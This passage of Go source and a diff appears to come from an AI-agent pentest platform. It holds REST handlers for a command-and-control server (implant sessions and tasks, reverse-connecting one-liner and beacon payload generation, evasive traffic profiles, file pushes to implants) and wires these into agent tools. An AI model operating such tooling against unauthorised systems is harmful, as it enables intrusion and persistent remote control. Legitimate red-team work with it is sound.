|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"deleted": true})
|
||||
}
|
||||
|
||||
// SetSessionSleep 设置会话的 sleep/jitter
|
||||
func (h *C2Handler) SetSessionSleep(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
var req struct {
|
||||
SleepSeconds int `json:"sleep_seconds"`
|
||||
JitterPercent int `json:"jitter_percent"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.mgr().DB().SetC2SessionSleep(id, req.SleepSeconds, req.JitterPercent); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"updated": true})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 任务 API
|
||||
// ============================================================================
|
||||
|
||||
// ListTasks 获取任务列表
|
||||
func (h *C2Handler) ListTasks(c *gin.Context) {
|
||||
filter := database.ListC2TasksFilter{
|
||||
SessionID: c.Query("session_id"),
|
||||
Status: c.Query("status"),
|
||||
}
|
||||
|
||||
paginated := false
|
||||
page := 1
|
||||
pageSize := 10
|
||||
if c.Query("page") != "" || c.Query("page_size") != "" {
|
||||
paginated = true
|
||||
if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 {
|
||||
page = p
|
||||
}
|
||||
if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "10")); err == nil && ps > 0 {
|
||||
pageSize = ps
|
||||
if pageSize > 100 {
|
||||
pageSize = 100
|
||||
}
|
||||
}
|
||||
filter.Limit = pageSize
|
||||
filter.Offset = (page - 1) * pageSize
|
||||
} else {
|
||||
if limit := c.Query("limit"); limit != "" {
|
||||
if n, err := strconv.Atoi(limit); err == nil && n > 0 {
|
||||
filter.Limit = n
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
tasks, err := h.mgr().DB().ListC2Tasks(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 仪表盘「待审任务」为全局 queued/pending 数量,与列表 session 过滤无关
|
||||
pendingN, _ := h.mgr().DB().CountC2TasksQueuedOrPending("")
|
||||
|
||||
if !paginated {
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"tasks": tasks,
|
||||
"pending_queued_count": pendingN,
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
total, err := h.mgr().DB().CountC2Tasks(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"tasks": tasks,
|
||||
"total": total,
|
||||
"page": page,
|
||||
"page_size": pageSize,
|
||||
"pending_queued_count": pendingN,
|
||||
})
|
||||
}
|
||||
|
||||
// DeleteTasks 批量删除任务(请求体 JSON: {"ids":["t_xxx",...]})
|
||||
func (h *C2Handler) DeleteTasks(c *gin.Context) {
|
||||
var req struct {
|
||||
IDs []string `json:"ids"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid json: " + err.Error()})
|
||||
return
|
||||
}
|
||||
if len(req.IDs) == 0 {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "ids is required"})
|
||||
return
|
||||
}
|
||||
n, err := h.mgr().DB().DeleteC2TasksByIDs(req.IDs)
|
||||
if err != nil {
|
||||
if errors.Is(err, database.ErrNoValidC2TaskIDs) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"deleted": n})
|
||||
}
|
||||
|
||||
// GetTask 获取单个任务
|
||||
func (h *C2Handler) GetTask(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
task, err := h.mgr().DB().GetC2Task(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if task == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "task not found"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"task": task})
|
||||
}
|
||||
|
||||
// CreateTask 创建任务
|
||||
func (h *C2Handler) CreateTask(c *gin.Context) {
|
||||
var req struct {
|
||||
SessionID string `json:"session_id"`
|
||||
TaskType string `json:"task_type"`
|
||||
Payload map[string]interface{} `json:"payload"`
|
||||
Source string `json:"source"`
|
||||
ConversationID string `json:"conversation_id"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
input := c2.EnqueueTaskInput{
|
||||
SessionID: req.SessionID,
|
||||
TaskType: c2.TaskType(req.TaskType),
|
||||
Payload: req.Payload,
|
||||
Source: firstNonEmpty(req.Source, "manual"),
|
||||
ConversationID: req.ConversationID,
|
||||
UserCtx: c.Request.Context(),
|
||||
}
|
||||
|
||||
task, err := h.mgr().EnqueueTask(input)
|
||||
if err != nil {
|
||||
code := http.StatusInternalServerError
|
||||
if e, ok := err.(*c2.CommonError); ok {
|
||||
code = e.HTTP
|
||||
}
|
||||
c.JSON(code, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"task": task})
|
||||
}
|
||||
|
||||
// CancelTask 取消任务
|
||||
func (h *C2Handler) CancelTask(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
if err := h.mgr().CancelTask(id); err != nil {
|
||||
code := http.StatusInternalServerError
|
||||
if e, ok := err.(*c2.CommonError); ok {
|
||||
code = e.HTTP
|
||||
}
|
||||
c.JSON(code, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"cancelled": true})
|
||||
}
|
||||
|
||||
// WaitTask 等待任务完成
|
||||
func (h *C2Handler) WaitTask(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
timeout := 60 * time.Second
|
||||
if t := c.Query("timeout"); t != "" {
|
||||
if n, err := strconv.Atoi(t); err == nil && n > 0 {
|
||||
timeout = time.Duration(n) * time.Second
|
||||
}
|
||||
}
|
||||
|
||||
deadline := time.Now().Add(timeout)
|
||||
for time.Now().Before(deadline) {
|
||||
task, err := h.mgr().DB().GetC2Task(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if task == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "task not found"})
|
||||
return
|
||||
}
|
||||
if task.Status == "success" || task.Status == "failed" || task.Status == "cancelled" {
|
||||
c.JSON(http.StatusOK, gin.H{"task": task})
|
||||
return
|
||||
}
|
||||
time.Sleep(500 * time.Millisecond)
|
||||
}
|
||||
c.JSON(http.StatusRequestTimeout, gin.H{"error": "timeout waiting for task completion"})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// Payload API
|
||||
// ============================================================================
|
||||
|
||||
// PayloadOneliner 生成单行 payload
|
||||
func (h *C2Handler) PayloadOneliner(c *gin.Context) {
|
||||
var req struct {
|
||||
ListenerID string `json:"listener_id"`
|
||||
Kind string `json:"kind"` // bash, python, powershell, curl_beacon
|
||||
Host string `json:"host"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
listener, err := h.mgr().DB().GetC2Listener(req.ListenerID)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if listener == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"})
|
||||
return
|
||||
}
|
||||
|
||||
host := c2.ResolveBeaconDialHost(listener, strings.TrimSpace(req.Host), h.logger, listener.ID)
|
||||
|
||||
kind := c2.OnelinerKind(req.Kind)
|
||||
if !c2.IsOnelinerCompatible(listener.Type, kind) {
|
||||
compatible := c2.OnelinerKindsForListener(listener.Type)
|
||||
names := make([]string, len(compatible))
|
||||
for i, k := range compatible {
|
||||
names[i] = string(k)
|
||||
}
|
||||
c.JSON(http.StatusBadRequest, gin.H{
|
||||
"error": fmt.Sprintf("监听器类型 %s 不支持 %s 类型的 oneliner,请选择兼容的类型", listener.Type, req.Kind),
|
||||
"compatible_kinds": names,
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
input := c2.OnelinerInput{
|
||||
Kind: kind,
|
||||
Host: host,
|
||||
Port: listener.BindPort,
|
||||
HTTPBaseURL: fmt.Sprintf("http://%s:%d", host, listener.BindPort),
|
||||
ImplantToken: listener.ImplantToken,
|
||||
}
|
||||
|
||||
oneliner, err := c2.GenerateOneliner(input)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"oneliner": oneliner,
|
||||
"kind": req.Kind,
|
||||
"host": host,
|
||||
"port": listener.BindPort,
|
||||
})
|
||||
}
|
||||
|
||||
// PayloadBuild 构建 beacon 二进制
|
||||
func (h *C2Handler) PayloadBuild(c *gin.Context) {
|
||||
var req struct {
|
||||
ListenerID string `json:"listener_id"`
|
||||
OS string `json:"os"`
|
||||
Arch string `json:"arch"`
|
||||
SleepSeconds int `json:"sleep_seconds"`
|
||||
JitterPercent int `json:"jitter_percent"`
|
||||
Host string `json:"host"` // 可选:编译进 Beacon 的回连地址,覆盖监听器 bind_host
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
listener, err := h.mgr().DB().GetC2Listener(req.ListenerID)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if listener == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"})
|
||||
return
|
||||
}
|
||||
|
||||
builder := c2.NewPayloadBuilder(h.mgr(), h.logger, "", "")
|
||||
input := c2.PayloadBuilderInput{
|
||||
ListenerID: req.ListenerID,
|
||||
OS: req.OS,
|
||||
Arch: req.Arch,
|
||||
SleepSeconds: req.SleepSeconds,
|
||||
JitterPercent: req.JitterPercent,
|
||||
Host: strings.TrimSpace(req.Host),
|
||||
}
|
||||
|
||||
result, err := builder.BuildBeacon(input)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"payload": result,
|
||||
})
|
||||
}
|
||||
|
||||
// PayloadDownload 下载 payload
|
||||
func (h *C2Handler) PayloadDownload(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
filename := id
|
||||
if !strings.HasPrefix(filename, "beacon_") {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"})
|
||||
return
|
||||
}
|
||||
if strings.Contains(filename, "/") || strings.Contains(filename, "\\") || strings.Contains(filename, "..") {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"})
|
||||
return
|
||||
}
|
||||
|
||||
builder := c2.NewPayloadBuilder(h.mgr(), h.logger, "", "")
|
||||
storageDir := builder.GetPayloadStoragePath()
|
||||
targetPath := filepath.Join(storageDir, filename)
|
||||
|
||||
absTarget, err := filepath.Abs(targetPath)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid path"})
|
||||
return
|
||||
}
|
||||
absDir, err := filepath.Abs(storageDir)
|
||||
if err != nil || !strings.HasPrefix(absTarget, absDir+string(filepath.Separator)) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"})
|
||||
return
|
||||
}
|
||||
|
||||
c.FileAttachment(absTarget, filepath.Base(absTarget))
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 事件 API
|
||||
// ============================================================================
|
||||
|
||||
// ListEvents 获取事件列表
|
||||
func (h *C2Handler) ListEvents(c *gin.Context) {
|
||||
filter := database.ListC2EventsFilter{
|
||||
Level: c.Query("level"),
|
||||
Category: c.Query("category"),
|
||||
SessionID: c.Query("session_id"),
|
||||
TaskID: c.Query("task_id"),
|
||||
}
|
||||
if since := c.Query("since"); since != "" {
|
||||
if t, err := time.Parse(time.RFC3339, since); err == nil {
|
||||
filter.Since = &t
|
||||
}
|
||||
}
|
||||
|
||||
paginated := false
|
||||
page := 1
|
||||
pageSize := 10
|
||||
if c.Query("page") != "" || c.Query("page_size") != "" {
|
||||
paginated = true
|
||||
if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 {
|
||||
page = p
|
||||
}
|
||||
if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "10")); err == nil && ps > 0 {
|
||||
pageSize = ps
|
||||
if pageSize > 100 {
|
||||
pageSize = 100
|
||||
}
|
||||
}
|
||||
filter.Limit = pageSize
|
||||
filter.Offset = (page - 1) * pageSize
|
||||
} else {
|
||||
if limit := c.Query("limit"); limit != "" {
|
||||
if n, err := strconv.Atoi(limit); err == nil && n > 0 {
|
||||
filter.Limit = n
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
events, err := h.mgr().DB().ListC2Events(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if !paginated {
|
||||
c.JSON(http.StatusOK, gin.H{"events": events})
|
||||
return
|
||||
}
|
||||
total, err := h.mgr().DB().CountC2Events(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"events": events,
|
||||
"total": total,
|
||||
"page": page,
|
||||
"page_size": pageSize,
|
||||
})
|
||||
}
|
||||
|
||||
// DeleteEvents 批量删除事件(请求体 JSON: {"ids":["e_xxx",...]})
|
||||
func (h *C2Handler) DeleteEvents(c *gin.Context) {
|
||||
var req struct {
|
||||
IDs []string `json:"ids"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid json: " + err.Error()})
|
||||
return
|
||||
}
|
||||
if len(req.IDs) == 0 {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "ids is required"})
|
||||
return
|
||||
}
|
||||
n, err := h.mgr().DB().DeleteC2EventsByIDs(req.IDs)
|
||||
if err != nil {
|
||||
if errors.Is(err, database.ErrNoValidC2EventIDs) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"deleted": n})
|
||||
}
|
||||
|
||||
// EventStream SSE 实时事件流
|
||||
func (h *C2Handler) EventStream(c *gin.Context) {
|
||||
c.Header("Content-Type", "text/event-stream")
|
||||
c.Header("Cache-Control", "no-cache")
|
||||
c.Header("Connection", "keep-alive")
|
||||
|
||||
sessionFilter := c.Query("session_id")
|
||||
categoryFilter := c.Query("category")
|
||||
levels := c.QueryArray("level")
|
||||
|
||||
sub := h.mgr().EventBus().Subscribe(
|
||||
"sse-"+uuid.New().String(),
|
||||
128,
|
||||
sessionFilter,
|
||||
categoryFilter,
|
||||
levels,
|
||||
)
|
||||
defer h.mgr().EventBus().Unsubscribe(sub.ID)
|
||||
|
||||
c.Stream(func(w io.Writer) bool {
|
||||
select {
|
||||
case e, ok := <-sub.Ch:
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
data, _ := json.Marshal(e)
|
||||
fmt.Fprintf(w, "data: %s\n\n", data)
|
||||
return true
|
||||
case <-c.Request.Context().Done():
|
||||
return false
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// Profile API
|
||||
// ============================================================================
|
||||
|
||||
// ListProfiles 获取 Malleable Profile 列表
|
||||
func (h *C2Handler) ListProfiles(c *gin.Context) {
|
||||
profiles, err := h.mgr().DB().ListC2Profiles()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"profiles": profiles})
|
||||
}
|
||||
|
||||
// GetProfile 获取单个 Profile
|
||||
func (h *C2Handler) GetProfile(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
profile, err := h.mgr().DB().GetC2Profile(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if profile == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "profile not found"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"profile": profile})
|
||||
}
|
||||
|
||||
// CreateProfile 创建 Profile
|
||||
func (h *C2Handler) CreateProfile(c *gin.Context) {
|
||||
var req database.C2Profile
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
req.ID = "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
req.CreatedAt = time.Now()
|
||||
|
||||
if err := h.mgr().DB().CreateC2Profile(&req); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"profile": req})
|
||||
}
|
||||
|
||||
// UpdateProfile 更新 Profile
|
||||
func (h *C2Handler) UpdateProfile(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
profile, err := h.mgr().DB().GetC2Profile(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if profile == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "profile not found"})
|
||||
return
|
||||
}
|
||||
|
||||
var req database.C2Profile
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
profile.Name = req.Name
|
||||
profile.UserAgent = req.UserAgent
|
||||
profile.URIs = req.URIs
|
||||
profile.RequestHeaders = req.RequestHeaders
|
||||
profile.ResponseHeaders = req.ResponseHeaders
|
||||
profile.BodyTemplate = req.BodyTemplate
|
||||
profile.JitterMinMS = req.JitterMinMS
|
||||
profile.JitterMaxMS = req.JitterMaxMS
|
||||
|
||||
if err := h.mgr().DB().UpdateC2Profile(profile); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"profile": profile})
|
||||
}
|
||||
|
||||
// DeleteProfile 删除 Profile
|
||||
func (h *C2Handler) DeleteProfile(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
if err := h.mgr().DB().DeleteC2Profile(id); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"deleted": true})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 文件管理 API(C2 Upload 任务需要先通过此 API 上传文件到 downstream 目录)
|
||||
// ============================================================================
|
||||
|
||||
// UploadFileForImplant 操作员上传文件,供 upload 任务推送给 implant
|
||||
func (h *C2Handler) UploadFileForImplant(c *gin.Context) {
|
||||
sessionID := strings.TrimSpace(c.PostForm("session_id"))
|
||||
remotePath := strings.TrimSpace(c.PostForm("remote_path"))
|
||||
if sessionID == "" || remotePath == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "session_id and remote_path required"})
|
||||
return
|
||||
}
|
||||
|
||||
file, header, err := c.Request.FormFile("file")
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "file field required: " + err.Error()})
|
||||
return
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
fileID := "f_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
dir := filepath.Join(h.mgr().StorageDir(), "downstream")
|
||||
if err := osMkdirAll(dir); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
dstPath := filepath.Join(dir, fileID+".bin")
|
||||
dst, err := osCreate(dstPath)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
n, err := io.Copy(dst, file)
|
||||
dst.Close()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// Record in DB
|
||||
dbFile := &database.C2File{
|
||||
ID: fileID,
|
||||
SessionID: sessionID,
|
||||
Direction: "upload",
|
||||
RemotePath: remotePath,
|
||||
LocalPath: dstPath,
|
||||
SizeBytes: n,
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
_ = h.mgr().DB().CreateC2File(dbFile)
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"file_id": fileID,
|
||||
"size": n,
|
||||
"filename": header.Filename,
|
||||
"remote_path": remotePath,
|
||||
})
|
||||
}
|
||||
|
||||
// ListFiles 列出某会话的文件记录
|
||||
func (h *C2Handler) ListFiles(c *gin.Context) {
|
||||
sessionID := c.Query("session_id")
|
||||
if sessionID == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "session_id required"})
|
||||
return
|
||||
}
|
||||
files, err := h.mgr().DB().ListC2FilesBySession(sessionID)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"files": files})
|
||||
}
|
||||
|
||||
// DownloadResultFile 下载任务结果文件(截图等 blob 结果)
|
||||
func (h *C2Handler) DownloadResultFile(c *gin.Context) {
|
||||
taskID := c.Param("id")
|
||||
task, err := h.mgr().DB().GetC2Task(taskID)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if task == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "task not found"})
|
||||
return
|
||||
}
|
||||
if task.ResultBlobPath == "" {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "no result file for this task"})
|
||||
return
|
||||
}
|
||||
c.FileAttachment(task.ResultBlobPath, filepath.Base(task.ResultBlobPath))
|
||||
}
|
||||
|
||||
func osMkdirAll(path string) error {
|
||||
return os.MkdirAll(path, 0o755)
|
||||
}
|
||||
|
||||
func osCreate(path string) (*os.File, error) {
|
||||
return os.Create(path)
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 辅助函数(firstNonEmpty 已在 vulnerability.go 中定义)
|
||||
// ============================================================================
|
||||
+144
-15
@@ -41,6 +41,14 @@ type SkillsToolRegistrar func() error
|
||||
// BatchTaskToolRegistrar 批量任务 MCP 工具注册器(ApplyConfig 时重新注册)
|
||||
type BatchTaskToolRegistrar func() error
|
||||
|
||||
// C2ToolRegistrar C2 MCP 工具注册器(ApplyConfig 时 ClearTools 之后调用)
|
||||
type C2ToolRegistrar func() error
|
||||
|
||||
// C2Runtime ApplyConfig 时按配置启停 C2 子系统(由 internal/app.App 实现)
|
||||
type C2Runtime interface {
|
||||
ReconcileC2AfterConfigApply() error
|
||||
}
|
||||
|
||||
// RetrieverUpdater 检索器更新接口
|
||||
type RetrieverUpdater interface {
|
||||
UpdateConfig(config *knowledge.RetrievalConfig)
|
||||
@@ -73,6 +81,8 @@ type ConfigHandler struct {
|
||||
webshellToolRegistrar WebshellToolRegistrar // WebShell 工具注册器(可选)
|
||||
skillsToolRegistrar SkillsToolRegistrar // Skills工具注册器(可选)
|
||||
batchTaskToolRegistrar BatchTaskToolRegistrar // 批量任务 MCP 工具(可选)
|
||||
c2ToolRegistrar C2ToolRegistrar // C2 MCP 工具(可选)
|
||||
c2Runtime C2Runtime // C2 启停(可选)
|
||||
retrieverUpdater RetrieverUpdater // 检索器更新器(可选)
|
||||
knowledgeInitializer KnowledgeInitializer // 知识库初始化器(可选)
|
||||
appUpdater AppUpdater // App更新器(可选)
|
||||
@@ -154,6 +164,20 @@ func (h *ConfigHandler) SetBatchTaskToolRegistrar(registrar BatchTaskToolRegistr
|
||||
h.batchTaskToolRegistrar = registrar
|
||||
}
|
||||
|
||||
// SetC2ToolRegistrar 设置 C2 MCP 工具注册器
|
||||
func (h *ConfigHandler) SetC2ToolRegistrar(registrar C2ToolRegistrar) {
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
h.c2ToolRegistrar = registrar
|
||||
}
|
||||
|
||||
// SetC2Runtime 设置 C2 运行时(Apply 时启停)
|
||||
func (h *ConfigHandler) SetC2Runtime(rt C2Runtime) {
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
h.c2Runtime = rt
|
||||
}
|
||||
|
||||
// SetRetrieverUpdater 设置检索器更新器
|
||||
func (h *ConfigHandler) SetRetrieverUpdater(updater RetrieverUpdater) {
|
||||
h.mu.Lock()
|
||||
@@ -193,6 +217,7 @@ type GetConfigResponse struct {
|
||||
Knowledge config.KnowledgeConfig `json:"knowledge"`
|
||||
Robots config.RobotsConfig `json:"robots,omitempty"`
|
||||
MultiAgent config.MultiAgentPublic `json:"multi_agent,omitempty"`
|
||||
C2 config.C2Public `json:"c2"`
|
||||
}
|
||||
|
||||
// ToolConfigInfo 工具配置信息
|
||||
@@ -286,6 +311,7 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
|
||||
Agent: h.config.Agent,
|
||||
Hitl: h.config.Hitl,
|
||||
Knowledge: h.config.Knowledge,
|
||||
C2: h.config.C2.Public(),
|
||||
Robots: h.config.Robots,
|
||||
MultiAgent: multiPub,
|
||||
})
|
||||
@@ -583,14 +609,46 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
||||
|
||||
// UpdateConfigRequest 更新配置请求
|
||||
type UpdateConfigRequest struct {
|
||||
OpenAI *config.OpenAIConfig `json:"openai,omitempty"`
|
||||
FOFA *config.FofaConfig `json:"fofa,omitempty"`
|
||||
MCP *config.MCPConfig `json:"mcp,omitempty"`
|
||||
Tools []ToolEnableStatus `json:"tools,omitempty"`
|
||||
Agent *config.AgentConfig `json:"agent,omitempty"`
|
||||
Knowledge *config.KnowledgeConfig `json:"knowledge,omitempty"`
|
||||
Robots *config.RobotsConfig `json:"robots,omitempty"`
|
||||
MultiAgent *config.MultiAgentAPIUpdate `json:"multi_agent,omitempty"`
|
||||
OpenAI *config.OpenAIConfig `json:"openai,omitempty"`
|
||||
FOFA *config.FofaConfig `json:"fofa,omitempty"`
|
||||
MCP *config.MCPConfig `json:"mcp,omitempty"`
|
||||
Tools []ToolEnableStatus `json:"tools,omitempty"`
|
||||
Agent *AgentConfigUpdate `json:"agent,omitempty"`
|
||||
Knowledge *config.KnowledgeConfig `json:"knowledge,omitempty"`
|
||||
Robots *config.RobotsConfig `json:"robots,omitempty"`
|
||||
MultiAgent *config.MultiAgentAPIUpdate `json:"multi_agent,omitempty"`
|
||||
C2 *config.C2APIUpdate `json:"c2,omitempty"`
|
||||
}
|
||||
|
||||
// AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。
|
||||
// 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。
|
||||
type AgentConfigUpdate struct {
|
||||
MaxIterations *int `json:"max_iterations,omitempty"`
|
||||
LargeResultThreshold *int `json:"large_result_threshold,omitempty"`
|
||||
ResultStorageDir *string `json:"result_storage_dir,omitempty"`
|
||||
ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"`
|
||||
SystemPromptPath *string `json:"system_prompt_path,omitempty"`
|
||||
}
|
||||
|
||||
func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
|
||||
if dst == nil || src == nil {
|
||||
return
|
||||
}
|
||||
if src.MaxIterations != nil {
|
||||
dst.MaxIterations = *src.MaxIterations
|
||||
}
|
||||
if src.LargeResultThreshold != nil {
|
||||
dst.LargeResultThreshold = *src.LargeResultThreshold
|
||||
}
|
||||
if src.ResultStorageDir != nil {
|
||||
dst.ResultStorageDir = *src.ResultStorageDir
|
||||
}
|
||||
if src.ToolTimeoutMinutes != nil {
|
||||
dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes
|
||||
}
|
||||
if src.SystemPromptPath != nil {
|
||||
dst.SystemPromptPath = *src.SystemPromptPath
|
||||
}
|
||||
}
|
||||
|
||||
// ToolEnableStatus 工具启用状态
|
||||
@@ -637,12 +695,19 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
|
||||
)
|
||||
}
|
||||
|
||||
